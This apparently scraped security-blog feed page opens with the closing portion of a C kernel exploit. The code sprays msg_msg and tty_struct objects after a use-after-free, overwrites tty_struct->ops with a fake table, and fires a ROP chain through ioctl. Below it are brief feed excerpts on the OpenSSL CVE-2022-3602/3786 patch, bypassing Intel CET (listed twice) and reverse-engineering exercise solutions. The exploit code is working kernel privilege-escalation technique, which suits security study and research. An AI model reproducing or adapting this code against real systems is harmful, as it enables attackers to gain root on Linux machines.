        // Allocate msg_msg structs until we allocate one in our free'd slab
        size_t q_remain = NUM_QUEUE;
        size_t fails = 0;
        while (q_remain--) {
            // Initialize a message queue for spraying msg_msg structs
            init_msg_q();
            printf("    >> msg_msg queue(s) initialized: %lu\n",
                NUM_QUEUE - q_remain);
            
            // Spray messages for this queue
            for (size_t i = 0; i < MSG_SPRAY; i++) {
                fails += send_message();
            }
    
            // Check to see if we found a msg_msg struct
            if (found_msg(fd4)) {
                break;
            }
            
            if (q_remain == 0) { err("Failed to find msg_msg struct"); }
        }
        
        // Solve our ROP chain address
        info("`msgsnd()` failures: %lu", fails);
        info("ROP chain address: 0x%lx", rop_addr);
        fake_table = rop_addr + rop_len;
        info("Fake tty_struct->ops function table: 0x%lx", fake_table);
        ioctl_ptr = fake_table + ioctl_off;
        info("Fake ioctl() handler: 0x%lx", ioctl_ptr);
    
        // Do a 3rd UAF
        info("Freeing fd5...");
        fd5 = open_device(DEV, O_RDWR);
        fd6 = open_device(DEV, O_RDWR);
        close(fd5);
    
        // Spray more /dev/ptmx terminals
        info("Spraying tty_structs...");
        p_remain = PTMX_SPRAY;
        while(p_remain--) {
            alloc_ptmx();
            printf("    >> tty_struct(s) alloc'd: %lu\n", PTMX_SPRAY - p_remain);
    
            // Check to see if we found a tty_struct
            if (found_ptmx(fd6)) {
                break;
            }
    
            if (p_remain == 0) { err("Failed to find tty_struct"); }
        }
    
        info("Found new tty_struct");
        info("Overwriting tty_struct->ops pointer with fake table...");
        overwrite_ops(fd6);
        info("Overwrote tty_struct->ops");
    
        // Spam IOCTL on all of our '/dev/ptmx' fds
        info("Spamming `ioctl()`...");
        for (size_t i = 0; i < num_ptmx; i++) {
            ioctl(open_ptmx[i], 0xcafebabe, rop_addr - 8); // pop rbp; ret;
        }
    
        return 0;
    }
    

    Everything you need to know about the OpenSSL 3.0.7 Patch (CVE-2022-3602 & CVE-2022-3786)

    1 November 2022 at 10:27

    Discussion thread: https://updatedsecurity.com/topic/9-openssl-vulnerability-cve-2022-3602-cve-2022-3786/ Vulnerability Details From https://www.openssl.org/news/secadv/20221101.txt X.509 Email Address 4-byte Buffer Overflow (CVE-2022-3602) ========================================================== Severity: High A buffer overrun can be triggered in X.509

    The post Everything you need to know about the OpenSSL 3.0.7 Patch (CVE-2022-3602 & CVE-2022-3786) appeared first on MalwareTech.

    Bypassing Intel CET with Counterfeit Objects

    10 June 2022 at 00:00
    Since its inception in 20051, return-oriented programming (ROP) has been the predominant avenue to thwart W^X2 mitigation during memory corruption exploitation. While Data Execution Prevention (DEP) has been engineered to block plain code injection attacks from specific memory areas, attackers have quickly adapted and instead of injecting an entire code payload, they resorted in reusing multiple code chunks from DEP-allowed memory pages, called ROP gadgets. These code chunks are taken from already existing code in the target application and chained together to resemble the desired attacker payload or to just disable DEP on a per page basis to allow the existing code payloads to run.

    Practical Reverse Engineering' Solutions - Chapter 1 - Part 2

    1 December 2022 at 00:00
    Introduction From now on, I decided to prioritize the exercises form which I think I can gain the most, so here am I going to cover just the Kernel routines decompilation/explanation. The book originally focused on x86 by this point, but since we are in 2020 I feel might be useful to cover both x86 and x64. Chapter 1 - Page 35 Decompile the following kernel routines in Windows: KeInitializeDpc KeInitializeApc ObFastDereferenceObject (and explain its calling convention) KeInitializeQueue KxWaitForLockChainValid KeReadyThread KiInitializeTSS RtlValidateUnicodeString Debugging Setup For debugging purpose I have used WinDbg with remote KD.

    Bypassing Intel CET with Counterfeit Objects

    26 August 2022 at 00:00
    Since its inception in 20051, return-oriented programming (ROP) has been the predominant avenue to thwart W^X2 mitigation during memory corruption exploitation. While Data Execution Prevention (DEP) has been engineered to block plain code injection attacks from specific memory areas, attackers have quickly adapted and instead of injecting an entire code payload, they resorted in reusing multiple code chunks from DEP-allowed memory pages, called ROP gadgets. These code chunks are taken from already existing code in the target application and chained together to resemble the desired attacker payload or to just disable DEP on a per page basis to allow the existing code payloads to run.
    ❌
    ❌